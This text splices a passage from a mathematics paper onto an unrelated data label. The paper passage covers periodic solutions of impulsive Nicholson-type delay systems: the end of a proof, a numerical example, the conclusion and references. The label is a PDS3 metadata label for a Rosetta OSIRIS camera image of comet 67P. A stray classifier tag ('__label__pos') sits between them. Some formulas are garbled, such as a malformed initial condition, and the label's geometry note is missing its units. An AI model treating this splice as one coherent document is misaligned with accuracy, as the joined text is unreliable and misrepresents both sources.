V_{2}(t)=\bigl|z_{2}(t)\bigr|e^{\lambda t}. $$ Calculating the upper right derivative of \(V_{i}(t) \) (\(i=1,2\)) along the solution \(z(t)\) of (3.10), we obtain $$\begin{aligned} D^{+}\bigl(V_{1}(t)\bigr)\leq{}&\Biggl[\bigl(\lambda- \alpha_{1}(t)\bigr)\bigl|z_{1}(t)\bigr|+\beta _{1}(t)\bigl|z_{2}(t)\bigr|+ \sum_{j=1}^{m} p_{1j}(t)\bigl|x_{1} \bigl(t-\tau _{1j}(t)\bigr)e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))} \\ &{}-\widetilde{x}_{1}\bigl(t-\tau_{1j}(t) \bigr)e^{-q_{1j}(t)\widetilde{x}_{1}(t-\tau _{1j}(t))}\bigr|\Biggr]e^{\lambda t} \quad \mbox{for all } t\geq t_{0}, \end{aligned}$$ (3.12) and $$\begin{aligned} D^{+}\bigl(V_{2}(t)\bigr)\leq{}&\Biggl[\bigl(\lambda- \alpha_{2}(t)\bigr)\bigl|z_{2}(t)\bigr|+\beta _{2}(t)\bigl|z_{1}(t)\bigr|+ \sum_{j=1}^{m} p_{2j}(t)\bigl|x_{2} \bigl(t-\tau _{2j}(t)\bigr)e^{-q_{2j}(t)x_{2}(t-\tau_{2j}(t))} \\ &{}-\widetilde{x}_{2}\bigl(t-\tau_{2j}(t) \bigr)e^{-q_{2j}(t)\widetilde{x}_{2}(t-\tau _{2j}(t))}\bigr|\Biggr]e^{\lambda t} \quad \mbox{for all } t\geq t_{0}. \end{aligned}$$ (3.13) We claim that there is \(M>0\) such that $$ V_{i}(t)=\bigl|z_{i}(t)\bigr|e^{\lambda t}\leq M\quad \mbox{for all }t>t_{0}, i=1,2. $$ (3.14) Otherwise, one of the following cases must occur. Case 1. There exists \(T_{1}>t_{0}\) such that $$ V_{1}(T_{1})=M \quad\mbox{and}\quad V_{i}(t)< M \quad \mbox{for all } t\in[t_{0}-\tau, T_{1}], i=1,2. $$ (3.15) Case 2. There exists \(T_{2}>t_{0}\) such that $$ V_{2}(T_{2})=M \quad \mbox{and} \quad V_{i}(t)< M \quad \mbox{for all } t\in[t_{0}-\tau, T_{2}], i=1,2. $$ (3.16) We will need the inequality $$ \bigl|xe^{-x}-ye^{-y}\bigr|\leq|x-y| \quad\mbox{for } x,y\in[0,+ \infty). $$ (3.17) Indeed, by the mean value theorem we have $$\bigl|xe^{-x}-ye^{-y}\bigr|=\biggl|\frac{1-\xi}{e^{\xi}}\biggr|\cdot|x-y|, \quad \mbox{where } \xi \mbox{ is between } x \mbox{ and } y. $$ For \(\xi>1\), we have \(|\frac{1-\xi}{e^{\xi}}|=\frac{\xi-1}{e^{\xi}}\leq \frac{1}{e^{2}}<1\), and for \(0\leq\xi\leq1\), we have \(|\frac{1-\xi }{e^{\xi}}|=\frac{1-\xi}{e^{\xi}}\leq1\). Therefore, inequality (3.17) holds. In case 1, in view of (3.12) and inequality (3.17), (3.15) implies that $$\begin{aligned} 0 \leq& D^{+} \bigl(V_{1}(T_{1})-M \bigr)\leq \Biggl[ \bigl( \lambda-\alpha _{1}(T_{1}) \bigr)\bigl|z_{1}(T_{1})\bigr|+ \beta_{1}(T_{1})\bigl|z_{2}(T_{1})\bigr| \\ &{}+\sum_{j=1}^{m} p_{1j}(T_{1})\bigl|x_{1} \bigl(T_{1}-\tau_{1j}(T_{1}) \bigr)e^{-q_{1j}(T_{1})x_{1}(T_{1}-\tau_{1j}(T_{1}))}\\ &{}- \widetilde{x}_{1} \bigl(T_{1}-\tau_{1j}(T_{1}) \bigr)e^{-q_{1j}(T_{1})\widetilde {x}_{1}(T_{1}-\tau_{1j}(T_{1}))}\bigr| \Biggr]e^{\lambda T_{1}} \\ =& \Biggl[ \bigl(\lambda-\alpha_{1}(T_{1}) \bigr)\bigl|z_{1}(T_{1})\bigr|+\beta_{1}(T_{1})\bigl|z_{2}(T_{1})\bigr|+ \sum_{j=1}^{m} \frac{p_{1j}(T_{1})}{q_{1j}(T_{1})} \\ &{}\times \bigl|q_{1j}(T_{1})x_{1} \bigl(T_{1}- \tau_{1j}(T_{1}) \bigr)e^{-q_{1j}(T_{1})x_{1}(T_{1}-\tau_{1j}(T_{1}))}\\ &{}-q_{1j}(T_{1}) \widetilde{x}_{1} \bigl(T_{1}-\tau _{1j}(T_{1}) \bigr)e^{-q_{1j}(T_{1})\widetilde{x}_{1}(T_{1}-\tau _{1j}(T_{1}))}\bigr| \Biggr]e^{\lambda T_{1}} \\ \leq& \bigl(\lambda-\alpha_{1}(T_{1}) \bigr)\bigl|z_{1}(T_{1})\bigr|e^{\lambda T_{1}}+ \beta _{1}(T_{1})\bigl|z_{2}(T_{1})\bigr|e^{\lambda T_{1}}\\ &{}+ \sum_{j=1}^{m} p_{1j}(T_{1})\bigl|z_{1} \bigl(T_{1}-\tau_{1j}(T_{1}) \bigr)\bigr|e^{\lambda(T_{1}-\tau _{1j}(T_{1}))}e^{\lambda\tau_{1j}(T_{1})} \\ \leq& \Biggl[ \bigl(\lambda-\alpha_{1}^{-} \bigr)+ \beta_{1}^{+}+\sum_{j=1}^{m} p_{1j}^{+}e^{\lambda\tau_{1}^{+}} \Biggr]M. \end{aligned}$$ Thus, $$\bigl(\lambda-\alpha_{1}^{-}\bigr)+\beta_{1}^{+}+ \sum_{j=1}^{m} p_{1j}^{+}e^{\lambda\tau_{1}^{+}} \geq0, $$ which contradicts (3.11). Hence, (3.14) holds. In case 2, in view of (3.13) and (3.17), (3.16) yields that $$\begin{aligned} 0 \leq&D^{+} \bigl(V_{2}(T_{2})-M \bigr)\leq \Biggl[ \bigl( \lambda- \alpha _{2}(T_{2}) \bigr)\bigl|z_{2}(T_{2})\bigr|+ \beta_{2}(T_{2})\bigl|z_{1}(T_{2})\bigr| \\ &{}+\sum_{j=1}^{m} p_{2j}(T_{2})\bigl|x_{2} \bigl(T_{2}-\tau _{2j}(T_{2}) \bigr)e^{-q_{2j}(T_{2})x_{2}(T_{2}-\tau_{2j}(T_{2}))}\\ &{}-\widetilde {x}_{2} \bigl(T_{2}-\tau_{2j}(T_{2}) \bigr)e^{-q_{2j}(T_{2})\widetilde{x}_{2}(T_{2}-\tau _{2j}(T_{2}))}\bigr| \Biggr]e^{\lambda T_{2}} \\ =& \Biggl[ \bigl(\lambda-\alpha_{2}(T_{2}) \bigr)\bigl|z_{2}(T_{2})\bigr|+\beta_{2}(T_{2})\bigl|z_{1}(T_{2})\bigr|+ \sum_{j=1}^{m} \frac{p_{2j}(T_{2})}{q_{2j}(T_{2})} \\ &{}\times\bigl|q_{2j}(T_{2})x_{2} \bigl(T_{2}- \tau _{2j}(T_{2}) \bigr)e^{-q_{2j}(T_{2})x_{2}(T_{2}-\tau_{2j}(T_{2}))}\\ &{}-q_{2j}(T_{2}) \widetilde{x}_{2} \bigl(T_{2}-\tau _{2j}(T_{2}) \bigr)e^{-q_{2j}(T_{2})\widetilde{x}_{2}(T_{2}-\tau _{2j}(T_{2}))}\bigr| \Biggr]e^{\lambda T_{2}} \\ \leq& \bigl(\lambda-\alpha_{2}(T_{2}) \bigr)\bigl|z_{2}(T_{2})\bigr|e^{\lambda T_{2}}+ \beta _{2}(T_{2})\bigl|z_{1}(T_{2})\bigr|e^{\lambda T_{2}}\\ &{}+ \sum_{j=1}^{m} p_{2j}(T_{2})\bigl|z_{2} \bigl(T_{2}-\tau_{2j}(T_{2}) \bigr)\bigr|e^{\lambda(T_{2}-\tau _{2j}(T_{2}))}e^{\lambda\tau_{2j}(T_{2})} \\ \leq& \Biggl[ \bigl(\lambda-\alpha_{2}^{-} \bigr)+ \beta_{2}^{+}+\sum_{j=1}^{m} p_{2j}^{+}e^{\lambda\tau_{2}^{+}} \Biggr]M. \end{aligned}$$ Thus, $$\bigl(\lambda-\alpha_{2}^{-}\bigr)+\beta_{2}^{+}+ \sum_{j=1}^{m} p_{2j}^{+}e^{\lambda\tau_{2}^{+}} \geq0, $$ which contradicts (3.11). Hence, (3.14) holds. It follows that $$ \bigl|z_{i}(t)\bigr|< Me^{-\lambda t} \quad \mbox{for all } t>t_{0}, i=1,2. $$ (3.18) In view of (3.18) and the periodicity of \(z(t)\), we have $$z_{i}(t)=x_{i}(t)-\widetilde{x}_{i}(t)=0 \quad \mbox{for all } t\in [t_{0}-\tau, \infty), i=1,2. $$ This completes the proof. □ Remark 3.1 In Theorems 3.1 and 3.2, the conditions that ensure the existence and uniqueness of a positive ω-periodic solution for Nicholson-type delay systems with and without impulses are simple and easily to test, which is less conservative than the conditions required in some previous works [11, 12]. Moreover, the main results in this paper are totally different from that of [17]. 4 An example Example 4.1 Consider the following impulsive Nicholson-type system with delays $$ \left \{ \textstyle\begin{array}{@{}l} y'_{1}(t)=-(9+\sin^{2}\pi t)y_{1}(t)+(5+\cos^{2}\pi t)y_{2}(t)+ (\frac{3}{16}+\frac {1}{2}|\sin\pi t|)y_{1}(t-e^{|\cos\pi t|})\\ \hphantom{y'_{1}(t)=}{}\times e^{-(\frac{7}{3}+|\sin\pi t|)y_{1} (t-e^{|\cos\pi t|})}\\ \hphantom{y'_{1}(t)=}{}+(\frac {5}{8}-\frac{1}{2}|\sin\pi t|)y_{1}(t-e^{|\sin\pi t|}) e^{-(\frac{5}{2}+|\cos\pi t|)y_{1}(t-e^{|\sin\pi t|})},\\ y'_{2}(t)=-(9+\cos^{2}\pi t)y_{1}(t)+(5+\sin^{2}\pi t)y_{2}(t)+ (\frac{3}{16}+\frac {1}{2}|\cos\pi t|)y_{1}(t-e^{|\sin\pi t|})\\ \hphantom{y'_{2}(t)=}{}\times e^{-(\frac{7}{3}+|\cos\pi t|)y_{1}(t-e^{|\sin\pi t|})}\\ \hphantom{y'_{2}(t)=}{}+(\frac {5}{8}-\frac{1}{2}|\cos\pi t|)y_{1}(t-e^{|\cos\pi t|}) e^{-(\frac{5}{2}+|\sin\pi t|)y_{1}(t-e^{|\cos\pi t|})},\quad t\geq0,\\ y_{i}(t^{+}_{k})=(1+b_{k})y_{i}(t_{k}), \quad i=1,2, k=1,2,\ldots, \end{array}\displaystyle \right . $$ (4.1) with initial condition $$ y_{i}(s)=\ln(3+t))=\varphi_{i}(t), \quad t\in[-e,0], i=1,2, $$ (4.2) where \(b_{k}=2^{\sin\frac{\pi}{2}k}-1\), and \(t_{k}=k\), \(k=1,2,\ldots\) . Let \(f(t)=\prod_{0< t_{k}< t}(1+b_{k})=\prod_{0< t_{k}< t}2^{\sin \frac{\pi}{2}k}\). Then $$\begin{aligned} f(t+4) =&\prod_{0< t_{k}< t+4}2^{\sin\frac{\pi }{2}k}=\prod _{0< t_{k}\leq4}2^{\sin\frac{\pi}{2}k} \cdot\prod _{4< t_{k}< t+4}2^{\sin\frac{\pi}{2}k} \\ =&2^{\sum _{k=1}^{4}\sin\frac{\pi}{2}k}\cdot \prod_{0< t_{k}< t}2^{\sin\frac{\pi}{2}(k-4)}=2^{0} \cdot \prod_{0< t_{k}< t}2^{\sin\frac{\pi}{2}k}=f(t), \end{aligned}$$ which implies that \(f(t)\) is a periodic function with period 4. Since \(\alpha_{1}(t)=9+\sin^{2}\pi t\), \(\alpha_{2}(t)=9+\cos^{2}\pi t\), \(\beta _{1}(t)=5+\cos^{2}\pi t\), \(\beta_{2}(t)=5+\sin^{2}\pi t\), we have \(\alpha_{1}^{-}=\alpha_{2}^{-}=9\), \(\beta_{1}^{+}=\beta_{2}^{+}=6\), and thus \(\frac{ \beta_{1}^{+}\beta_{2}^{+}}{\alpha_{1}^{-}\alpha_{2}^{-}}=\frac {4}{9}<1\). It is obvious that $$\begin{aligned}& p_{11}(t)=\prod_{t-e^{|\cos\pi t|}\leq t_{k}< t}2^{\sin\frac{\pi}{2}k} \biggl(\frac{3}{16}+\frac{1}{2}|\sin\pi t| \biggr), \\& p_{12}(t)=\prod_{t-e^{|\sin\pi t|}\leq t_{k}< t}2^{\sin\frac{\pi }{2}k} \biggl(\frac{5}{8}-\frac{1}{2}|\sin\pi t| \biggr), \\& p_{21}(t)=\prod_{t-e^{|\sin\pi t|}\leq t_{k}< t}2^{\sin\frac{\pi}{2}k} \biggl(\frac{3}{16}+\frac{1}{2}|\cos\pi t| \biggr), \\& p_{22}(t)=\prod_{t-e^{|\cos\pi t|}\leq t_{k}< t}2^{\sin\frac{\pi }{2}k} \biggl(\frac{5}{8}-\frac{1}{2}|\cos\pi t| \biggr), \\& q_{11}(t)=\prod_{0< t_{k}< t-e^{|\cos\pi t|}}2^{\sin\frac{\pi}{2}k} \biggl(\frac{7}{3}+|\sin\pi t| \biggr), \\& q_{12}(t)=\prod _{0< t_{k}< t-e^{|\sin\pi t|}}2^{\sin\frac{\pi}{2}k} \biggl(\frac{5}{2}+| \cos \pi t| \biggr), \\& q_{21}(t)=\prod_{0< t_{k}< t-e^{|\sin\pi t|}}2^{\sin\frac{\pi}{2}k} \biggl(\frac{7}{3}+|\cos\pi t| \biggr), \\& q_{22}(t)=\prod _{0< t_{k}< t-e^{|\cos\pi t|}}2^{\sin\frac{\pi}{2}k} \biggl(\frac{5}{2}+| \sin \pi t| \biggr). \end{aligned}$$ Therefore, $$\alpha_{i}^{-}-\beta_{i}^{+}-\sum _{j=1}^{2} p_{ij}^{+}= \frac {3}{4}>0,\quad i=1,2. $$ It follows from Theorem 3.2 that Equation (4.1) with initial condition (4.2) has a unique 4-periodic solution. This fact is verified by the numerical simulation in Figure 1. Figure 1 Figure 1 The dynamic behavior of the system ( 4.1 ) with the initial condition ( 4.2 ). (a) Time-series of the \(y_{1}\), \(y_{2}\) of system (4.1) without impulsive effects for \(t\in[0,20]\). (b) Phase portrait of solutions of system (4.1) without impulsive effects for \(t\in[3,20]\). (c) Times-series of the \(y_{1}\), \(y_{2}\) of impulsive system (4.1) for \(t\in[0,20]\). (d) Phase portrait of solutions of impulsive system (4.1) for \(t\in[5,20]\). Remark 4.1 System (4.1) is a simple form of impulsive Nicholson-type system with delays. Since \(q_{11}^{-}=q_{21}^{-}=\frac{7}{6}>1\), \(q_{12}^{-}= q_{22}^{-}=\frac{5}{4}>1\), it is clear that the condition of Theorem 3.1 in [11] and Theorem 2.1 in [12] are not satisfied. Therefore, all the results obtained in [11, 12] and the references therein cannot be applicable to system (4.1). This implies that the results of this paper are essentially new. 5 Conclusion In this paper, a class of Nicholson-type delay systems with impulsive effects are investigated. First, an equivalence relation between the solution (or positive periodic solution) of a Nicholson-type delay system with impulses and that of the corresponding Nicholson-type delay system without impulses is established. Then, by applying the cone fixed point theorem, some criteria are established for the existence and uniqueness of a positive periodic solution of the given system. The fixed point theorem in cones is very popular in investigation of positive periodic solutions to impulsive functional differential equations [20, 21]. Our results imply that under the appropriate linear periodic impulsive perturbations, the Nicholson-type delay systems with impulses preserve the original periodic property of the Nicholson-type delay systems without impulses. Finally, an example and its simulation are provided to illustrate the main results. It is worth noting that there are only very few results [17] on Nicholson-type delay systems with impulses, and our results extend and improve greatly some earlier works reported in the literature. Furthermore, our results are important in applications of periodic oscillatory Nicholson-type delay systems with impulsive control. Declarations Acknowledgements This work is supported by the National Natural Science Foundation of China (Grant No. 11171374) and the Scientific Research Fund of Shandong Provincial of P.R. China (Grant No. ZR2011AZ001). Open Access This article is distributed under the terms of the Creative Commons Attribution 4.0 International License (http://creativecommons.org/licenses/by/4.0/), which permits unrestricted use, distribution, and reproduction in any medium, provided you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. Authors’ Affiliations (1) School of Mathematical Sciences, Ocean University of China, Qingdao, 266100, China References 1. Nicholson, AJ: An outline of the dynamics of animal populations. Aust. J. Zool. 2(1), 9-65 (1954) View ArticleGoogle Scholar 2. Gurney, WSC, Blythe, SP, Nisbet, RM: Nicholson’s blowflies revisited. Nature 287(5777), 17-21 (1980) View ArticleGoogle Scholar 3. Kulenović, MRS, Ladas, G, Sficas, YG: Global attractivity in Nicholson’s blowflies. Appl. Anal. 43(1-2), 109-124 (1992) View ArticleMathSciNetMATHGoogle Scholar 4. Saker, SH, Agarwal, S: Oscillation and global attractivity in a periodic Nicholson’s blowflies model. Math. Comput. Model. 35(7-8), 719-731 (2002) View ArticleMathSciNetMATHGoogle Scholar 5. Chen, Y: Periodic solutions of delayed periodic Nicholson’s blowflies models. Can. Appl. Math. Q. 11(1), 23-28 (2003) MathSciNetMATHGoogle Scholar 6. Gyori, I, Trofimchuk, SI: On the existence of rapidly oscillatory solutions in the Nicholson blowflies equation. Nonlinear Anal., Real World Appl. 48(7), 1033-1042 (2002) View ArticleMathSciNetGoogle Scholar 7. Li, J, Du, C: Existence of positive periodic solutions for a generalized Nicholson’s blowflies model. J. Comput. Appl. Math. 221(1), 226-233 (2008) View ArticleMathSciNetMATHGoogle Scholar 8. Berezansky, L, Braverman, E, Idels, L: Nicholson’s blowflies differential equations revisited: main results and open problems. Appl. Math. Model. 34(6), 1405-1417 (2010) View ArticleMathSciNetMATHGoogle Scholar 9. Hou, X, Duan, L, Huang, Z: Permanence and periodic solutions for a class of delay Nicholson’s blowflies models. Appl. Math. Model. 37(3), 1537-1544 (2013) View ArticleMathSciNetGoogle Scholar 10. Berezansky, L, Idels, L, Troib, L: Global dynamics of Nicholson-type delay systems with applications. Nonlinear Anal., Real World Appl. 12(1), 436-445 (2011) View ArticleMathSciNetMATHGoogle Scholar 11. Wang, W, Wang, L, Chen, W: Existence and exponential stability of positive almost periodic solution for Nicholson-type delay systems. Nonlinear Anal., Real World Appl. 12(4), 1938-1949 (2011) View ArticleMathSciNetMATHGoogle Scholar 12. Liu, B: The existence and uniqueness of positive periodic solutions of Nicholson-type delay systems. Nonlinear Anal., Real World Appl. 12(6), 3145-3151 (2011) View ArticleMathSciNetMATHGoogle Scholar 13. Lakshmikantham, V, Bainov, DD, Simeonov, PS: Theory of Impulsive Differential Equations. World Scientific, Singapore (1989) View ArticleMATHGoogle Scholar 14. Bainov, DD, Simeonov, PS: Theory of Impulsive Differential Equations: Periodic Solutions and Applications. Longman, Harlow (1993) Google Scholar 15. Samoilenko, AM, Perestyuk, NA: Differential Equations with Impulsive Effect. World Scientific, Singapore (1995) Google Scholar 16. Benchohra, M, Henderson, J, Ntouyas, S: Impulsive Differential Equations and Inclusions, vol. 2. Hindawi Publishing Corporation, New York (2006) View ArticleMATHGoogle Scholar 17. Zhang, R, Lian, F: The existence and uniqueness of positive periodic solutions for a class of Nicholson-type systems with impulses and delays. Abstr. Appl. Anal. (2013). doi:10.1155/2013/980935 MathSciNetGoogle Scholar 18. Yan, J, Zhao, A: Oscillation and stability of linear impulsive delay differential equations. J. Math. Anal. Appl. 227(1), 187-194 (1998) View ArticleMathSciNetMATHGoogle Scholar 19. Guo, D: Nonlinear Functional Analysis. Shandong Science and Technology Press, Jinan (2001) (in Chinese) Google Scholar 20. Zhang, N, Dai, B, Qian, X: Periodic solutions for a class of higher-dimension functional differential equations with impulses. Nonlinear Anal. 68, 629-638 (2008) View ArticleMathSciNetMATHGoogle Scholar 21. Kocherha, OI, Nenya, OI, Tkachenko, VI: On positive periodic solutions of nonlinear impulsive functional differential equations. Nonlinear Oscil. 4(11), 527-538 (2008) View ArticleGoogle Scholar Copyright © Zhang et al. 2015 Advertisement
__label__pos
0.99668
PDS_VERSION_ID = PDS3 LABEL_REVISION_NOTE = "RO-RIS-MPAE-ID-023 1/e" /* FILE CHARACTERISTICS */ RECORD_TYPE = FIXED_LENGTH RECORD_BYTES = 1 FILE_RECORDS = 201203 FILE_NAME = "W20150127T151250683ID4BF21.JPG" /* POINTERS TO DATA OBJECTS */ ^JPEG_DOCUMENT = "W20150127T151250683ID4BF21.JPG" /* MANDATORY FIELDS */ PRODUCT_ID = "W20150127T151250683ID4BF21.JPG" SOURCE_PRODUCT_ID = "W20150127T151250683ID4BF21.IMG" /* MISSION IDENTIFICATION */ INSTRUMENT_HOST_ID = "RO" INSTRUMENT_HOST_NAME = "ROSETTA-ORBITER" MISSION_ID = "ROSETTA" MISSION_NAME = "INTERNATIONAL ROSETTA MISSION" MISSION_PHASE_NAME = "COMET ESCORT 1" /* INSTRUMENT DESCRIPTION */ INSTRUMENT_ID = "OSIWAC" INSTRUMENT_NAME = "OSIRIS - WIDE ANGLE CAMERA" INSTRUMENT_TYPE = "FRAME CCD REFLECTING TELESCOPE" DETECTOR_DESC = "2048x2048 PIXELS BACKLIT FRAME CCD DETECTOR" DETECTOR_PIXEL_WIDTH = 13.5 DETECTOR_PIXEL_HEIGHT = 13.5 DETECTOR_TYPE = "SI CCD" DETECTOR_ID = "EEV-242" DETECTOR_TEMPERATURE = 167.01 ELEVATION_FOV = 11.680 AZIMUTH_FOV = 11.680 ROSETTA:VERTICAL_RESOLUTION = 9.949900e-05 ROSETTA:HORIZONTAL_RESOLUTION = 9.949900e-05 TELESCOPE_F_NUMBER = 5.600000 ROSETTA:VERTICAL_FOCAL_LENGTH = 0.1357 ROSETTA:HORIZONTAL_FOCAL_LENGTH = 0.1357 /* IMAGE IDENTIFICATION */ IMAGE_ID = "40045100" ROSETTA:PROCESSING_ID = 0 IMAGE_OBSERVATION_TYPE = "REGULAR" EXPOSURE_TYPE = "MANUAL" PRODUCT_TYPE = "RDR" PRODUCT_VERSION_ID = "1" PRODUCER_INSTITUTION_NAME = "Max Planck Institute for Solar System Research" PRODUCER_FULL_NAME = "CECILIA TUBIANA" PRODUCER_ID = "MPS" MEDIUM_TYPE = "ELECTRONIC" PUBLICATION_DATE = 2018-11-15 VOLUME_FORMAT = "ANSI" VOLUME_ID = "ROOSI_4230" VOLUME_NAME = "RESAMPLED OSIRIS WAC DATA FOR THE COMET ESCORT 1 PHASE" VOLUME_SERIES_NAME = "ROSETTA SCIENCE ARCHIVE" VOLUME_SET_NAME = "ROSETTA OSIRIS DATA" VOLUME_SET_ID = "DE_MPG_MPS_ROOSI_4230" VOLUME_VERSION_ID = "VERSION V1.0" VOLUMES = "UNK" DATA_SET_ID = "RO-C-OSIWAC-4-ESC1-67P-M12-REFLECT-V1.0" DATA_SET_NAME = "ROSETTA-ORBITER 67P OSIWAC 4 ESC1-MTP012 RDR-REFLECT V1.0" PROCESSING_LEVEL_ID = "4" PROCESSING_LEVEL_DESC = "Radiometrically calibrated, geometric distortion corrected data, in reflectance units" DATA_QUALITY_ID = "0000000000000000" DATA_QUALITY_DESC = "List of 0 and 1 to specify the quality of the image. Zeroes mean that the data are good, and a one means that the data are affected by this particular issue. The meaning of the individual entries from right to left are: 1: affected by shutter error 2: contains missing packets 3: header created with insufficient data 4: shutter backtravel opening (curtain) 5: shutter backtravel opening (ballistic dual) 6: first lines are dark Note that the field is 16 characters in total to allow for possible extensions in future, but not all digits are used. Any unused digit is set to 0. e.g. 0000000000000010 means that the image contains missing packets, 0000000000010001 means that the image is affected by a shutter error AND by dual ballistic backtravel opening." /* TIME IDENTIFICATION */ PRODUCT_CREATION_TIME = 2018-11-08T20:45:15 START_TIME = 2015-01-27T15:14:04.000 STOP_TIME = 2015-01-27T15:14:05.250 SPACECRAFT_CLOCK_START_COUNT = "1/0380992370.44784" SPACECRAFT_CLOCK_STOP_COUNT = "1/0380992371.61168" /* GEOMETRY */ NOTE = "The values of the keywords SC_SUN_POSITION_VECTOR SC_TARGET_POSITION_VECTOR and SC_TARGET_VELOCITY_VECTOR are related to the Earth Mean Equator J2000 reference frame. The values of SUB_SPACECRAFT_LATITUDE and SUB_SPACECRAFT_LONGITUDE are northern latitude and eastern longitude in the standard planetocentric IAU_ frame. All values are computed for the time t = START_TIME. Distances are given in , velocities in , Angles in ." TARGET_NAME = "67P/CHURYUMOV-GERASIMENKO 1 (1969 R1)" ROSETTA:SPICE_TARGET_NAME = "67P/CHURYUMOV-GERASIMENKO" TARGET_TYPE = COMET SC_SUN_POSITION_VECTOR = (-269342108.542 , 206713380.979 , 138568128.787 ) SPACECRAFT_SOLAR_DISTANCE = 366710675.635 SOLAR_ELONGATION = 89.68053 RIGHT_ASCENSION = 39.39011 DECLINATION = 29.79281 NORTH_AZIMUTH = 154.38854 SC_TARGET_POSITION_VECTOR = (15.794 , 22.608 , -1.787 ) SC_TARGET_VELOCITY_VECTOR = (0.054 , -0.026 , 0.144 ) TARGET_CENTER_DISTANCE = 27.63597 SPACECRAFT_ALTITUDE = 26.26462 SUB_SPACECRAFT_LATITUDE = -21.48339 SUB_SPACECRAFT_LONGITUDE = 122.20230 SUB_SOLAR_LATITUDE = 27.24462 SUB_SOLAR_LONGITUDE = 42.69923 PHASE_ANGLE = 90.31947 GROUP = SC_COORDINATE_SYSTEM COORDINATE_SYSTEM_NAME = "S/C-COORDS" ORIGIN_OFFSET_VECTOR = (269353701.160 , -206722276.929 , -138574092.246 ) ORIGIN_ROTATION_QUATERNION = (0.18820532, -0.31228591, -0.39470718, -0.84336380) QUATERNION_DESC = "J2000 to Rosetta Coordinate System quaternion (nx sin(a/2), ny sin(a/2), nz sin(a/2), cos(a/2)" REFERENCE_COORD_SYSTEM_NAME = "EME J2000" END_GROUP = SC_COORDINATE_SYSTEM GROUP = CAMERA_COORDINATE_SYSTEM COORDINATE_SYSTEM_NAME = "WAC_CAMERA_FRAME" ORIGIN_OFFSET_VECTOR = (-0.001050 , 0.000232 , 0.002114 ) ORIGIN_ROTATION_QUATERNION = (-0.70710115, 0.70710470, -0.00282099, -0.00171403) QUATERNION_DESC = "Rosetta Coordinate System to camera coordinate system quaternion (nx sin(a/2), ny sin(a/2), nz sin(a/2), cos(a/2)" REFERENCE_COORD_SYSTEM_NAME = "S/C-COORDS" END_GROUP = CAMERA_COORDINATE_SYSTEM SPICE_FILE_NAME = ("ck\CATT_DV_145_02_______00216.BC", "ck\RATT_DV_145_01_01_T6_00216.BC", "dsk\ROS_CG_M003_OSPCLPS_N_V1.BDS", "fk\ROS_V32.TF", "fk\ROS_V33.TF", "ik\ROS_OSIRIS_V15.TI", "lsk\NAIF0011.TLS", "pck\ROS_CG_RAD_V10.TPC", "sclk\ROS_160929_STEP.TSC", "spk\CORB_DV_257_03___T19_00345.BSP", "spk\DE405.BSP", "spk\RORB_DV_257_03___T19_00345.BSP") /* IMAGE POINT OF INTEREST */ GROUP = IMAGE_POI ROSETTA:POINT_OF_INTEREST = "N/A" ROSETTA:IMAGE_POI_PIXEL = "N/A" ROSETTA:COORDINATE_SYSTEM = "N/A" ROSETTA:SURFACE_INTERCEPT_DISTANCE = "N/A" ROSETTA:SURF_INT_CART_COORD = "N/A" END_GROUP = IMAGE_POI /* SCIENCE ACTIVITY */ GROUP = SCIENCE_ACTIVITY ROSETTA:MISSION_PHASE = ("LTP004", "MTP012", "STP040") ROSETTA:RATIONALE_DESC = "GAS" ROSETTA:OPERATIONAL_ACTIVITY = "TAG_GAS_COMA_SCAN_CAMPAIGN" ROSETTA:ACTIVITY_NAME = "STP040_360_SCAN" END_GROUP = SCIENCE_ACTIVITY /* DATA CONTENT FLAGS */ GROUP = SR_DATA_CONTENT ROSETTA:PREPIXEL_FLAG = FALSE ROSETTA:POSTPIXEL_FLAG = FALSE ROSETTA:OVERCLOCKING_LINES_FLAG = FALSE ROSETTA:CCD_DATA_FLAG = TRUE ROSETTA:B1_SHUTTER_PULSE_FLAG = TRUE ROSETTA:B2_SHUTTER_PULSE_FLAG = TRUE END_GROUP = SR_DATA_CONTENT /* STATUS FLAGS */ GROUP = SR_STATUS_FLAGS ROSETTA:SHUTTER_FOUND_IN_ERROR_FLAG = FALSE ROSETTA:SHUTTER_PRE_INIT_FAILED_FLAG = FALSE ROSETTA:ERROR_RECOVERY_FAILED_FLAG = FALSE ROSETTA:EXPOSURE_STATUS_ID = SUCCESS END_GROUP = SR_STATUS_FLAGS /* MECHANISM STATUS FLAGS */ GROUP = SR_MECHANISM_STATUS FILTER_NUMBER = "21" FILTER_NAME = "Green_Empty" ROSETTA:FRONT_DOOR_STATUS_ID = OPEN END_GROUP = SR_MECHANISM_STATUS /* IMAGE ACQUISITION OPTIONS */ GROUP = SR_ACQUIRE_OPTIONS ROSETTA:SCIENCE_DATA_LINK = HIGHSPEED ROSETTA:DATA_ROUTING_ID = QUEUE2 EXPOSURE_DURATION = 1.2500 ROSETTA:COMMANDED_FILTER_NUMBER = 21 ROSETTA:COMMANDED_FILTER_NAME = "Green_Empty" ROSETTA:GRAYSCALE_TESTMODE_FLAG = FALSE ROSETTA:HARDWARE_BINNING_ID = "2x2" ROSETTA:AMPLIFIER_ID = B ROSETTA:GAIN_ID = HIGH ROSETTA:ADC_ID = TANDEM ROSETTA:OVERCLOCKING_LINES_FLAG = FALSE ROSETTA:OVERCLOCKING_PIXELS_FLAG = FALSE ROSETTA:CCD_ENABLED_FLAG = TRUE ROSETTA:ADC_ENABLED_FLAG = TRUE ROSETTA:BLADE1_PULSES_ENABLED_FLAG = TRUE ROSETTA:BLADE2_PULSES_ENABLED_FLAG = TRUE ROSETTA:BULBMODE_ENABLED_FLAG = FALSE ROSETTA:FRAMETRANSFER_ENABLED_FLAG = FALSE ROSETTA:WINDOWING_ENABLED_FLAG = TRUE ROSETTA:SHUTTER_ENABLED_FLAG = TRUE ROSETTA:DITHERING_ENABLED_FLAG = FALSE ROSETTA:CRB_DUMP_MODE = 0 ROSETTA:CRB_PULSE_MODE = 0 ROSETTA:SUBFRAME_COORDINATE_ID = "ELECTRICAL" ROSETTA:X_START = 0 ROSETTA:X_END = 2048 ROSETTA:Y_START = 0 ROSETTA:Y_END = 2048 ROSETTA:SHUTTER_PRETRIGGER_DURATION = 0.0650 ROSETTA:CRB_TO_PCM_SYNC_MODE = 16 ROSETTA:AUTOEXPOSURE_FLAG = FALSE ROSETTA:LOWPOWER_MODE_FLAG = FALSE ROSETTA:DUAL_EXPOSURE_FLAG = FALSE END_GROUP = SR_ACQUIRE_OPTIONS /* PROCESSING FLAGS */ 